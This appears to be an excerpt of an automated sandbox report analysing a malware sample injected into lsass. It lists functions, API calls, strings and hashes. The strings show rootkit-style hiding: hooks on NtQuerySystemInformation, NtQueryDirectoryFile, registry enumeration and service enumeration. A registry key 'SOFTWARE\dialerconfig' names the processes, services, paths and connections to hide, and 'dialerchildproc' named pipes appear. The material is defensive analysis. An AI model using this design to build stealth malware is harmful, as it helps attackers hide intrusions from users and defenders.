HeapAlloc.KERNEL32 ref: 00000213BDCE1037

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
Instruction ID: 7acfc98fedcf48397cbe37345a46a18bbd34040895f1dbd09d5cc9c764857c60
Opcode Fuzzy Hash: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
Instruction Fuzzy Hash: 25E01271621A00D7EB08DF66D8083D976E2FB9DF19F48C024C9094B314EE3D8699C710

Function 00000213BDCE3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000213BDCE347A
PathFindFileNameW.SHLWAPI ref: 00000213BDCE3489

Part of subcall function 00000213BDCE3930: StrCmpNIW.SHLWAPI ref: 00000213BDCE3948

Part of subcall function 00000213BDCE3878: GetModuleHandleW.KERNEL32 ref: 00000213BDCE3886
Part of subcall function 00000213BDCE3878: GetCurrentProcess.KERNEL32 ref: 00000213BDCE38B4
Part of subcall function 00000213BDCE3878: VirtualProtectEx.KERNEL32 ref: 00000213BDCE38D6
Part of subcall function 00000213BDCE3878: GetCurrentProcess.KERNEL32 ref: 00000213BDCE38F4
Part of subcall function 00000213BDCE3878: VirtualProtectEx.KERNEL32 ref: 00000213BDCE3915

CreateThread.KERNEL32 ref: 00000213BDCE34D7

Part of subcall function 00000213BDCE1EB4: GetCurrentThread.KERNEL32 ref: 00000213BDCE1EBF

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 35a2373febbd298c96ccda2e03ae3ebf42af853a822c4d32016ecaa8c58cdf20
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: AA1161B061CA0953FF22D721B90E7E92697B77430EF445235A906891D8FF3BF3488610

Function 00000213BDCE1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000213BDCE1650: GetProcessHeap.KERNEL32 ref: 00000213BDCE165B
Part of subcall function 00000213BDCE1650: HeapAlloc.KERNEL32 ref: 00000213BDCE166A
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16DA
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1707
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1721
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1741
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE175C
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE177C
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1797
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17B7
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE17D2
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17F2

Sleep.KERNEL32 ref: 00000213BDCE1C43
SleepEx.KERNELBASE ref: 00000213BDCE1C49

Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE180D
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE182D
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1848
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1868
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1883
Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE18A3
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE18BE
Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE18C8

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: a0f392aaf88b1dfc6e48b7e117115603c5291f4de9550e2820ced89c78e4f692
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 2C3110B560860993FE51DF26D9483DE12A7AB64BDCF046032DE0987696FF32E7708350

Function 00000213BDCB2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000213BDCB2A31

Memory Dump Source

Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: ff27eb41dcb5b73217d9f66f3d93e9fcb499343be5ad2be27ed4907ae2897191
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: D261123274525587EE68CF25D4887ADF392FB24B9CF548025DA1A07785EB3AEB53CB00

Non-executed Functions

Function 00000213BDCE2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000213BDCE2D80
lstrlenW.KERNEL32 ref: 00000213BDCE2FBA

Part of subcall function 00000213BDCE1A14: OpenProcess.KERNEL32 ref: 00000213BDCE1A3A
Part of subcall function 00000213BDCE1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000213BDCE1A58
Part of subcall function 00000213BDCE1A14: PathFindFileNameW.SHLWAPI ref: 00000213BDCE1A67
Part of subcall function 00000213BDCE1A14: lstrlenW.KERNEL32 ref: 00000213BDCE1A73
Part of subcall function 00000213BDCE1A14: StrCpyW.SHLWAPI ref: 00000213BDCE1A86
Part of subcall function 00000213BDCE1A14: CloseHandle.KERNEL32 ref: 00000213BDCE1A94

GetProcAddress.KERNEL32 ref: 00000213BDCE2D95

Part of subcall function 00000213BDCE1554: StrCmpIW.SHLWAPI ref: 00000213BDCE1585

Part of subcall function 00000213BDCE3930: StrCmpNIW.SHLWAPI ref: 00000213BDCE3948

StrCmpNIW.SHLWAPI ref: 00000213BDCE2DD8
lstrlenW.KERNEL32 ref: 00000213BDCE2F00

Strings

NtQueryObject, xrefs: 00000213BDCE2D8B
\Device\Nsi, xrefs: 00000213BDCE2DCB
ntdll.dll, xrefs: 00000213BDCE2D79

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: ca9904828aa5c22bee977df1f79897f42c607b25d1b57698437f8faa860b30b2
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 5AB192B2218A5883EF64CF25C4487E9A3A6F768B8DF545026EE0957794FF36EB40C340

Function 00000213BDCE7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000213BDCE7E8C
RtlCaptureContext.NTDLL ref: 00000213BDCE7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000213BDCE7ED3
RtlVirtualUnwind.NTDLL ref: 00000213BDCE7F14
IsDebuggerPresent.KERNEL32 ref: 00000213BDCE7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000213BDCE7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000213BDCE7F94

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: eafa0bfd2c6caafee150dbefaf866147db6823b9347aedc9e104821d9a0450aa
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: B0315BB2208B849AEB60DF60E8443ED7361F79474CF44442ADA4E47B99EF39C748C714

Function 00000213BDCEB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000213BDCEB585
RtlLookupFunctionEntry.NTDLL ref: 00000213BDCEB59D
RtlVirtualUnwind.NTDLL ref: 00000213BDCEB5D8
IsDebuggerPresent.KERNEL32 ref: 00000213BDCEB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000213BDCEB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000213BDCEB626

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 899406dd9d5b6fbe9dbae707097402a3bd2e2a6e0ff52354d21bb90e827dad56
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: DF315E72208F8496DB60CF25E8443DE73A5F79875CF500126EA9D47BA9EF39C7498B00

Function 00000213BDCEFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000213BDCEFF67
WriteFile.KERNEL32 ref: 00000213BDCF021E
WriteFile.KERNEL32 ref: 00000213BDCF0270
GetLastError.KERNEL32 ref: 00000213BDCF0372
GetLastError.KERNEL32 ref: 00000213BDCF03D2

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: b304ae2e26442db500cb89171f9cd10eae45a2c1c1ffb37558ed07a3952ec39e
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: E5E1F372708A809AEB50CF64D4883DD7BB2F355B8CF548126DE4A5BB99EA35C71AC700

Function 00000213BDCE1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000213BDCE165B
HeapAlloc.KERNEL32 ref: 00000213BDCE166A

Part of subcall function 00000213BDCE1274: GetProcessHeap.KERNEL32 ref: 00000213BDCE127A
Part of subcall function 00000213BDCE1274: HeapAlloc.KERNEL32 ref: 00000213BDCE1289
Part of subcall function 00000213BDCE1274: GetProcessHeap.KERNEL32 ref: 00000213BDCE12A3
Part of subcall function 00000213BDCE1274: HeapAlloc.KERNEL32 ref: 00000213BDCE12B4

Part of subcall function 00000213BDCE1000: GetProcessHeap.KERNEL32 ref: 00000213BDCE1006
Part of subcall function 00000213BDCE1000: HeapAlloc.KERNEL32 ref: 00000213BDCE1015
Part of subcall function 00000213BDCE1000: GetProcessHeap.KERNEL32 ref: 00000213BDCE1028
Part of subcall function 00000213BDCE1000: HeapAlloc.KERNEL32 ref: 00000213BDCE1037

RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16DA
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1707
RegCloseKey.ADVAPI32 ref: 00000213BDCE1721
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1741
RegCloseKey.ADVAPI32 ref: 00000213BDCE175C
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE177C
RegCloseKey.ADVAPI32 ref: 00000213BDCE1797
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17B7
RegCloseKey.ADVAPI32 ref: 00000213BDCE17D2
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17F2
RegCloseKey.ADVAPI32 ref: 00000213BDCE180D
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE182D
RegCloseKey.ADVAPI32 ref: 00000213BDCE1848
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1868
RegCloseKey.ADVAPI32 ref: 00000213BDCE1883
RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE18A3
RegCloseKey.ADVAPI32 ref: 00000213BDCE18BE
RegCloseKey.ADVAPI32 ref: 00000213BDCE18C8

Part of subcall function 00000213BDCE12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000213BDCE1326
Part of subcall function 00000213BDCE12C8: GetProcessHeap.KERNEL32 ref: 00000213BDCE1334
Part of subcall function 00000213BDCE12C8: HeapAlloc.KERNEL32 ref: 00000213BDCE1345
Part of subcall function 00000213BDCE12C8: RegEnumValueW.ADVAPI32 ref: 00000213BDCE13A1
Part of subcall function 00000213BDCE12C8: GetProcessHeap.KERNEL32 ref: 00000213BDCE13E9
Part of subcall function 00000213BDCE12C8: HeapAlloc.KERNEL32 ref: 00000213BDCE13F7
Part of subcall function 00000213BDCE12C8: GetProcessHeap.KERNEL32 ref: 00000213BDCE141B
Part of subcall function 00000213BDCE12C8: HeapFree.KERNEL32 ref: 00000213BDCE1429
Part of subcall function 00000213BDCE12C8: lstrlenW.KERNEL32 ref: 00000213BDCE1432
Part of subcall function 00000213BDCE12C8: GetProcessHeap.KERNEL32 ref: 00000213BDCE1440
Part of subcall function 00000213BDCE12C8: HeapAlloc.KERNEL32 ref: 00000213BDCE144E

Strings

startup, xrefs: 00000213BDCE16FD
tcp_local, xrefs: 00000213BDCE1826
paths, xrefs: 00000213BDCE17B0
tcp_remote, xrefs: 00000213BDCE1861
udp, xrefs: 00000213BDCE189C
SOFTWARE\dialerconfig, xrefs: 00000213BDCE16BA
pid, xrefs: 00000213BDCE173A
service_names, xrefs: 00000213BDCE17EB
process_names, xrefs: 00000213BDCE1775

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 922c905eacfc6ff9b5d7e5ee8ee23e6a2f76922591df28c004eccb8142a8d691
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 75712B76314E5496EF10DF62E8486D923A6F7A4B8CF402122DA4D87728EF3AC758C300

Function 00000213BDCE12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000213BDCE1326
GetProcessHeap.KERNEL32 ref: 00000213BDCE1334
HeapAlloc.KERNEL32 ref: 00000213BDCE1345
RegEnumValueW.ADVAPI32 ref: 00000213BDCE13A1

Part of subcall function 00000213BDCE1554: StrCmpIW.SHLWAPI ref: 00000213BDCE1585

GetProcessHeap.KERNEL32 ref: 00000213BDCE13E9
HeapAlloc.KERNEL32 ref: 00000213BDCE13F7
GetProcessHeap.KERNEL32 ref: 00000213BDCE141B
HeapFree.KERNEL32 ref: 00000213BDCE1429
lstrlenW.KERNEL32 ref: 00000213BDCE1432
GetProcessHeap.KERNEL32 ref: 00000213BDCE1440
HeapAlloc.KERNEL32 ref: 00000213BDCE144E
StrCpyW.SHLWAPI ref: 00000213BDCE1470
GetProcessHeap.KERNEL32 ref: 00000213BDCE1485
HeapFree.KERNEL32 ref: 00000213BDCE1493

Strings

d, xrefs: 00000213BDCE1365

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: c05d0bd73bb20f110e136ef88ee1e7915113fa0142f2850efa12ddce9de511b3
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 8B516072218B4493EB14DF62E5483DA73A2F799B8CF448125DA4947B18EF39D369CB40

Function 00000213BDCE1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000213BDCE1EBF

Part of subcall function 00000213BDCE2174: GetModuleHandleA.KERNEL32 ref: 00000213BDCE218C
Part of subcall function 00000213BDCE2174: GetProcAddress.KERNEL32 ref: 00000213BDCE219D

Part of subcall function 00000213BDCE5C10: GetCurrentThreadId.KERNEL32 ref: 00000213BDCE5C4B

Strings

NtResumeThread, xrefs: 00000213BDCE1F02
advapi32.dll, xrefs: 00000213BDCE1F97, 00000213BDCE1FB8
NtQueryDirectoryFile, xrefs: 00000213BDCE1F1F
EnumServiceGroupW, xrefs: 00000213BDCE1F90
ntdll.dll, xrefs: 00000213BDCE1ECD
EnumServicesStatusExW, xrefs: 00000213BDCE1FB1, 00000213BDCE1FD2
NtQuerySystemInformation, xrefs: 00000213BDCE1EE5
sechost.dll, xrefs: 00000213BDCE1FD9
NtDeviceIoControlFile, xrefs: 00000213BDCE1FF6
NtQueryDirectoryFileEx, xrefs: 00000213BDCE1F3C
NtEnumerateValueKey, xrefs: 00000213BDCE1F76
NtEnumerateKey, xrefs: 00000213BDCE1F59

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: d021cbab7c8d3db1f98d434a9803d44f83e8160b85b5d63a4cef5ea0ce537124
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: A231C7B1118A4AA2FE04EF64E8597D4A323B77834CF815433A41D4A169FF3A974EC384

Function 00000213BDCE23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000213BDCE2405
GetCurrentProcessId.KERNEL32 ref: 00000213BDCE240F

Part of subcall function 00000213BDCE19AC: OpenProcess.KERNEL32 ref: 00000213BDCE19CA
Part of subcall function 00000213BDCE19AC: IsWow64Process.KERNEL32 ref: 00000213BDCE19E0
Part of subcall function 00000213BDCE19AC: CloseHandle.KERNEL32 ref: 00000213BDCE19FB

CreateFileW.KERNEL32 ref: 00000213BDCE2468
WriteFile.KERNEL32 ref: 00000213BDCE2490
ReadFile.KERNEL32 ref: 00000213BDCE24AF
CloseHandle.KERNEL32 ref: 00000213BDCE24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000213BDCE243F
\\.\pipe\dialerchildproc64, xrefs: 00000213BDCE2438

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: ede12efc8e376077b0b866396e57bdc42fb7257f1e19bc7fe029267b8d71f0ff
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: F7214136618B4493FB10CB25E4487D9B3A2F399BACF504215EA5906BA8EF3DC349CF00

Function 00000213BDCE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000213BDCE10AB
RegEnumValueW.ADVAPI32 ref: 00000213BDCE110E
GetProcessHeap.KERNEL32 ref: 00000213BDCE1155
HeapAlloc.KERNEL32 ref: 00000213BDCE1163
GetProcessHeap.KERNEL32 ref: 00000213BDCE1187
HeapFree.KERNEL32 ref: 00000213BDCE1195

Strings

d, xrefs: 00000213BDCE10CE

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: f775d0b854ccff875a5a4fe2c3ed9a65cd4689a4e084aa52be3ee5af2899a8c1
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 99417173218B8497EB60CF51E4487DAB7A2F39978CF008125DB8947B58EF39D265CB00

Function 00000213BDCE75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000213BDCE7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000213BDCE766A
_RTC_Initialize.LIBCMT ref: 00000213BDCE7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000213BDCE76BE
__scrt_release_startup_lock.LIBCMT ref: 00000213BDCE76E9

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: a70e2868a3674efca74706f7a1f8c9029aa822793189d19dcffaae516c3cdb79
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: A2810FB170C78987FE60EB25A8493E92293A77178CF344135D9084B7D6FB3AEB468700

Function 00000213BDCB69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000213BDCB6A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000213BDCB6A6A
_RTC_Initialize.LIBCMT ref: 00000213BDCB6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000213BDCB6ABE
__scrt_release_startup_lock.LIBCMT ref: 00000213BDCB6AE9

Memory Dump Source

Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: eab646407fb415bcd271bdd7b8d74e229cdddd17f168040cd44df6bbfbba876a
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 2F81D2317CC24986FE54EB25D4493E966A3E775B8CF184025AE044B7D6FB3BCB868700

Function 00000213BDCE9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000213BDCE9889
GetLastError.KERNEL32 ref: 00000213BDCE9897
LoadLibraryExW.KERNEL32 ref: 00000213BDCE98C1
FreeLibrary.KERNEL32 ref: 00000213BDCE9907
GetProcAddress.KERNEL32 ref: 00000213BDCE9913

Strings

api-ms-, xrefs: 00000213BDCE98A9

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 6d9a40135cc713c70157257fe573e51b07df91e3d11a61b95067af7e8a374051
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 2131A57121AB54A2EE21DB02A8087D97396F729BACF194635DD2D4B394FF39D7498300

Function 00000213BDCF1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000213BDCF1BCD
GetLastError.KERNEL32 ref: 00000213BDCF1BD9
CloseHandle.KERNEL32 ref: 00000213BDCF1BF1
CreateFileW.KERNEL32 ref: 00000213BDCF1C1C
WriteConsoleW.KERNEL32 ref: 00000213BDCF1C3B

Strings

CONOUT$, xrefs: 00000213BDCF1BFD

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
